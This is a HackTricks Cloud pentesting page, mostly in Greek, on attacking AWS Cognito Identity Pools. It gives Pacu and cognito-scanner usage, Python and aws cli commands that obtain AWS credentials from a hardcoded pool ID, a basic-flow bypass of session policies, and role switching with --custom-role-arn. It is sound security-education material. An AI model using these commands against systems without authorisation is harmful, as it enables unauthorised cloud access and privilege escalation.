Cognito Identity Pools

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Basic Information

Οι πισίνες ταυτοτήτων παίζουν κρίσιμο ρόλο επιτρέποντας στους χρήστες σας να αποκτούν προσωρινές πιστοποιήσεις. Αυτές οι πιστοποιήσεις είναι απαραίτητες για την πρόσβαση σε διάφορες υπηρεσίες AWS, συμπεριλαμβανομένων αλλά όχι περιορισμένων σε Amazon S3 και DynamoDB. Ένα αξιοσημείωτο χαρακτηριστικό των πισινών ταυτοτήτων είναι η υποστήριξή τους για ανώνυμους επισκέπτες καθώς και για μια σειρά παρόχων ταυτοτήτων για την αυθεντικοποίηση χρηστών. Οι υποστηριζόμενοι πάροχοι ταυτοτήτων περιλαμβάνουν:

Amazon Cognito user pools
Επιλογές κοινωνικής σύνδεσης όπως Facebook, Google, Login with Amazon, και Sign in with Apple
Πάροχοι συμβατοί με OpenID Connect (OIDC)
SAML (Security Assertion Markup Language) πάροχοι ταυτοτήτων
Ταυτότητες που πιστοποιούνται από προγραμματιστές

# Sample code to demonstrate how to integrate an identity provider with an identity pool can be structured as follows:
import boto3

# Initialize the Amazon Cognito Identity client
client = boto3.client('cognito-identity')

# Assume you have already created an identity pool and obtained the IdentityPoolId
identity_pool_id = 'your-identity-pool-id'

# Add an identity provider to the identity pool
response = client.set_identity_pool_roles(
IdentityPoolId=identity_pool_id,
Roles={
'authenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/AuthenticatedRole',
'unauthenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/UnauthenticatedRole',
}
)

# Print the response from AWS
print(response)

Cognito Sync

Για να δημιουργήσετε συνεδρίες Identity Pool, πρέπει πρώτα να δημιουργήσετε και ένα Identity ID. Αυτό το Identity ID είναι η ταυτοποίηση της συνεδρίας αυτού του χρήστη. Αυτές οι ταυτοποιήσεις μπορούν να έχουν έως 20 σύνολα δεδομένων που μπορούν να αποθηκεύσουν έως 1MB ζευγών κλειδιού-τιμής.

Αυτό είναι χρήσιμο για να διατηρείτε πληροφορίες ενός χρήστη (ο οποίος θα χρησιμοποιεί πάντα το ίδιο Identity ID).

Επιπλέον, η υπηρεσία cognito-sync είναι η υπηρεσία που επιτρέπει να διαχειρίζεστε και να συγχρονίζετε αυτές τις πληροφορίες (στα σύνολα δεδομένων, στέλνοντας πληροφορίες σε ροές και μηνύματα SNS...).

Tools for pentesting

Pacu, το πλαίσιο εκμετάλλευσης AWS, περιλαμβάνει τώρα τα modules "cognito__enum" και "cognito__attack" που αυτοματοποιούν την καταμέτρηση όλων των περιουσιακών στοιχείων Cognito σε έναν λογαριασμό και επισημαίνουν αδύναμες ρυθμίσεις, χαρακτηριστικά χρηστών που χρησιμοποιούνται για έλεγχο πρόσβασης, κ.λπ., και επίσης αυτοματοποιούν τη δημιουργία χρηστών (συμπεριλαμβανομένης της υποστήριξης MFA) και την κλιμάκωση προνομίων με βάση τροποποιήσιμα προσαρμοσμένα χαρακτηριστικά, χρησιμοποιήσιμα διαπιστευτήρια identity pool, ρόλους που μπορούν να αναληφθούν σε id tokens, κ.λπ.

Για περιγραφή των λειτουργιών των modules δείτε το μέρος 2 της δημοσίευσης στο blog. Για οδηγίες εγκατάστασης δείτε την κύρια σελίδα Pacu.

Usage

Δείγμα χρήσης cognito__attack για να προσπαθήσετε να δημιουργήσετε χρήστη και όλους τους διαύλους privesc κατά ενός συγκεκριμένου identity pool και client user pool:

Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools
us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients
59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX

Δείγμα χρήσης cognito__enum για τη συλλογή όλων των πισίνων χρηστών, πελατών πισίνας χρηστών, πισίνων ταυτότητας, χρηστών κ.λπ. που είναι ορατές στον τρέχοντα λογαριασμό AWS:

Pacu (new:test) > run cognito__enum

Cognito Scanner είναι ένα εργαλείο CLI σε python που υλοποιεί διάφορες επιθέσεις στο Cognito, συμπεριλαμβανομένης της ανεπιθύμητης δημιουργίας λογαριασμών και της κλιμάκωσης πιστωτικών δεξαμενών.

Εγκατάσταση

$ pip install cognito-scanner

Χρήση

$ cognito-scanner --help

Για περισσότερες πληροφορίες ελέγξτε το https://github.com/padok-team/cognito-scanner

Πρόσβαση σε IAM Ρόλους

Μη Αυθεντικοποιημένος

Το μόνο που χρειάζεται να γνωρίζει ένας επιτιθέμενος για να λάβει AWS credentials σε μια εφαρμογή Cognito ως μη αυθεντικοποιημένος χρήστης είναι το Identity Pool ID, και αυτό το ID πρέπει να είναι σκληρά κωδικοποιημένο στην εφαρμογή ιστού/κινητού για να το χρησιμοποιήσει. Ένα ID μοιάζει έτσι: eu-west-1:098e5341-8364-038d-16de-1865e435da3b (δεν είναι επιθέσιμο με brute force).

Ο μη αυθεντικοποιημένος ρόλος IAM Cognito που δημιουργήθηκε μέσω ονομάζεται από προεπιλογή Cognito_<Identity Pool name>Unauth_Role

Αν βρείτε ένα Identity Pools ID σκληρά κωδικοποιημένο και επιτρέπει μη αυθεντικοποιημένους χρήστες, μπορείτε να αποκτήσετε AWS credentials με:

import requests

region = "us-east-1"
id_pool_id = 'eu-west-1:098e5341-8364-038d-16de-1865e435da3b'
url = f'https://cognito-identity.{region}.amazonaws.com/'
headers = {"X-Amz-Target": "AWSCognitoIdentityService.GetId", "Content-Type": "application/x-amz-json-1.1"}
params = {'IdentityPoolId': id_pool_id}

r = requests.post(url, json=params, headers=headers)
json_resp = r.json()

if not "IdentityId" in json_resp:
print(f"Not valid id: {id_pool_id}")
exit

IdentityId = r.json()["IdentityId"]

params = {'IdentityId': IdentityId}

headers["X-Amz-Target"] = "AWSCognitoIdentityService.GetCredentialsForIdentity"
r = requests.post(url, json=params, headers=headers)

print(r.json())

Ή θα μπορούσατε να χρησιμοποιήσετε τις παρακάτω aws cli εντολές:

aws cognito-identity get-id --identity-pool-id <identity_pool_id> --no-sign
aws cognito-identity get-credentials-for-identity --identity-id <identity_id> --no-sign

Σημειώστε ότι από προεπιλογή ένας μη αυθεντικοποιημένος cognito χρήστης ΔΕΝ ΜΠΟΡΕΙ να έχει καμία άδεια, ακόμη και αν έχει ανατεθεί μέσω πολιτικής. Ελέγξτε την επόμενη ενότητα.

Ενισχυμένη vs Βασική ροή αυθεντικοποίησης

Η προηγούμενη ενότητα ακολούθησε την προεπιλεγμένη ενισχυμένη ροή αυθεντικοποίησης. Αυτή η ροή ορίζει μια περιοριστική πολιτική συνεδρίας για τη συνεδρία ρόλου IAM που δημιουργείται. Αυτή η πολιτική θα επιτρέπει μόνο στη συνεδρία να χρησιμοποιεί τις υπηρεσίες από αυτή τη λίστα (ακόμη και αν ο ρόλος είχε πρόσβαση σε άλλες υπηρεσίες).

Ωστόσο, υπάρχει τρόπος να παρακαμφθεί αυτό, αν η δεξαμενή ταυτοτήτων έχει ενεργοποιημένη την "Βασική (Κλασική) Ροή", ο χρήστης θα μπορεί να αποκτήσει μια συνεδρία χρησιμοποιώντας αυτή τη ροή που δεν θα έχει αυτή την περιοριστική πολιτική συνεδρίας.

# Get auth ID
aws cognito-identity get-id --identity-pool-id <identity_pool_id> --no-sign

# Get login token
aws cognito-identity get-open-id-token --identity-id <identity_id> --no-sign

# Use login token to get IAM session creds
## If you don't know the role_arn use the previous enhanced flow to get it
aws sts assume-role-with-web-identity --role-arn "arn:aws:iam::<acc_id>:role/<role_name>" --role-session-name sessionname --web-identity-token <token> --no-sign

Αν λάβετε αυτό το σφάλμα, είναι επειδή η βασική ροή δεν είναι ενεργοποιημένη (προεπιλογή)

An error occurred (InvalidParameterException) when calling the GetOpenIdToken operation: Basic (classic) flow is not enabled, please use enhanced flow.

Έχοντας ένα σύνολο διαπιστευτηρίων IAM, θα πρέπει να ελέγξετε ποια πρόσβαση έχετε και να προσπαθήσετε να κλιμακώσετε τα δικαιώματα.

Αυθεντικοποιημένος

Θυμηθείτε ότι οι αυθεντικοποιημένοι χρήστες πιθανόν να έχουν διαφορετικές άδειες, οπότε αν μπορείτε να εγγραφείτε μέσα στην εφαρμογή, προσπαθήστε να το κάνετε αυτό και να αποκτήσετε τα νέα διαπιστευτήρια.

Μπορεί επίσης να υπάρχουν ρόλοι διαθέσιμοι για αυθεντικοποιημένους χρήστες που έχουν πρόσβαση στην Identity Pool.

Για αυτό μπορεί να χρειαστεί να έχετε πρόσβαση στον πάροχο ταυτότητας. Αν αυτός είναι μια Cognito User Pool, ίσως μπορείτε να εκμεταλλευτείτε τη προεπιλεγμένη συμπεριφορά και να δημιουργήσετε έναν νέο χρήστη μόνοι σας.

Ο ρόλος IAM Cognito που δημιουργήθηκε μέσω ονομάζεται προεπιλεγμένα Cognito_<Identity Pool name>Auth_Role

Ούτως ή άλλως, το παρακάτω παράδειγμα αναμένει ότι έχετε ήδη συνδεθεί μέσα σε μια Cognito User Pool που χρησιμοποιείται για την πρόσβαση στην Identity Pool (μην ξεχάσετε ότι άλλοι τύποι παρόχων ταυτότητας θα μπορούσαν επίσης να είναι ρυθμισμένοι).

aws cognito-identity get-id \
--identity-pool-id <identity_pool_id> \
--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>

# Πάρτε το identity_id από την προηγούμενη απάντηση εντολής
aws cognito-identity get-credentials-for-identity \
--identity-id <identity_id> \
--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>


# Στο IdToken μπορείτε να βρείτε ρόλους στους οποίους έχει πρόσβαση ένας χρήστης λόγω των Ομάδων User Pool
# Χρησιμοποιήστε το --custom-role-arn για να αποκτήσετε διαπιστευτήρια για έναν συγκεκριμένο ρόλο
aws cognito-identity get-credentials-for-identity \
--identity-id <identity_id> \
    --custom-role-arn <role_arn> \
    --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>

Είναι δυνατόν να ρυθμίσετε διαφορετικούς ρόλους IAM ανάλογα με τον πάροχο ταυτότητας που συνδέεται ο χρήστης ή ακόμα και απλά ανάλογα με τον χρήστη (χρησιμοποιώντας αξιώσεις). Επομένως, αν έχετε πρόσβαση σε διαφορετικούς χρήστες μέσω του ίδιου ή διαφορετικών παρόχων, ίσως αξίζει να συνδεθείτε και να αποκτήσετε πρόσβαση στους ρόλους IAM όλων αυτών.

Υποστήριξη HackTricks

Ελέγξτε τα σχέδια συνδρομής!
Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.

PreviousAWS - Cognito Enum NextCognito User Pools

Last updated 3 days ago